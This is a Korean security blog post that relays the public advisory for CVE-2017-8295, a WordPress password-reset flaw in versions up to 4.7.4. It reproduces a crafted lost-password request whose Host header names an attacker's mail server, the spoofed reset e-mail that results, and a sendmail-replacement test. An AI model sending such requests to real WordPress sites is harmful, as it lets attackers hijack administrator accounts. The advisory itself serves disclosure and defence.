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[M1S] 워드 프레스 4.7.4 이하버젼 취약점 공개

안녕하세요. Security M1S 입니다.

본 포스팅에서는 워드프레스 4.7.4 이하버젼에서의 취약점을 공개하려고 합니다.

CVE2017-8295 로 명명된 본 취약점은 무단으로 패스워드를 재설정 할 수 있는 치명적인 긴급 취약점입니다.

(4.7.4 버젼에서도 동작하는지는 테스팅 해보신분 께서 결과 댓글 부탁드립니다.^^;;)

해당 exploit 상세 안내:

- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):
-----[ HTTP Request ]----
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Wordpress will trigger the password reset function for the admin user account.
Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:
------[ resulting e-mail ]-----
Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Someone requested that the password be reset for the following account:
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.
The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
bash script of:
cat > /tmp/outgoing-email

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